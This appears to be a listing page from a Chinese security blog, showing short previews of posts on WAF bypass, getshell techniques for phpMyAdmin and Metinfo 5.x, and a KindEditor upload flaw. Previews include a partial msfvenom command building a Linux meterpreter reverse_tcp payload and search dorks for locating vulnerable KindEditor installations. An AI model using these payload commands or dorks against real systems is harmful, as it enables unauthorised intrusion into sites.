技术文章

这家伙很懒,还没填写该栏目的介绍呢~

技术文章

我的WafBypass之道(Misc篇)

阅读(106)评论(0)

0x00 前言 I am back ... 再不出这篇就要被笑然老板吊打了 ... 本来这一篇打算写免杀的。考虑了下既然是预期最后一篇那就写个汇总和一些偏门的吧。并且在辍写本文时将前两篇进行了增改。本文主要讲以下几点,也是讲的并不全,但是实用。对其进行简单的阐述下: Bypass 菜刀连接拦截 ...

技术文章

我的WafBypass之道(Upload篇)

阅读(63)评论(0)

0x00 前言 玩waf当然也要讲究循序渐进,姊妹篇就写文件上传好了,感觉也就SQLi和Xss的WafBypass最体现发散性思维的,而文件上传、免杀、权限提升这几点的Bypass更需要的是实战的经验。本文内容为沉淀下来的总结以及一些经典案例。想到哪写到哪,所以可能不是很全。创造姿势不易,且行且珍惜。(案例图不好上,毕竟是upload的By...

技术文章

我的WafBypass之道(SQL注入篇)

阅读(153)评论(0)

0x00 前言 去年到现在就一直有人希望我出一篇关于waf绕过的文章,我觉得这种老生常谈的话题也没什么可写的。很多人一遇到waf就发懵,不知如何是好,能搜到的各种姿势也是然并卵。但是积累姿势的过程也是迭代的,那么就有了此文,用来总结一些学习和培养突破waf的思想。可能总结的并不全,但目的并不是讲那些网上搜来一大把的东西,So......

技术文章

跟心仪的妹子玩游戏误入博彩APP,顺手破了个案

阅读(274)评论(0)

一、前言 过年回家饭局上碰到一个原来心仪的妹子,虽然已经4、5年没见面了,妹子见到我还是分外亲热,不仅主动挨着我坐着,居然还邀请我一起玩游戏,心中窃喜不已,哥们王者刚上了王者星耀,先好好炫一下技术,然后…… 妹子就给我发来了这个: 下载一看,尼玛什么鬼,妹子居然也玩网络棋牌了,这种小游戏一般都很弱啊,要...

技术文章

msfvenom生成各种Payload命令

阅读(127)评论(0)

msfvenom -l        列出所有模块,攻击载荷 Binaries linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to C...

技术文章

Phpmyadmin Get shell 思路汇总

阅读(191)评论(0)

PhpMyadmin各版本漏洞合集 一: 影响版本:3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3 ANYUN.ORG 概述:PhpMyAdmin存在PREGREPLACEEVAL漏洞 利用模块:exploit/multi/http/phpmyadminpregreplace CVE: CVE-20...

技术文章

Metinfo 5.X版本GETSHELL漏洞合集

阅读(154)评论(0)

0x00 前言 2018年1月底某CMS官方隆重发布6.0版本,调整了之前“漏洞百出”的框架结构,修(杜)复(绝)了多个5.X的版本后台Gestshell漏洞。 0x01安装过程过滤不严导致Getshell 前提:有删除/config/install.lock权限 1. 结合网上爆出的后台任意文件删除漏洞...

技术文章

kindeditor<=4.1.5 Oday

阅读(227)评论(1)

漏洞存在于 kindeditor 编辑器里,你能上传 .txt 和 .html 文件,支持 php/asp/jsp/asp.net 关键字: allinurl:/examples/uploadbutton.html allinurl:/php/upload_json.php / .asp ...



Powered by 小陈 © Boon theme By 小陈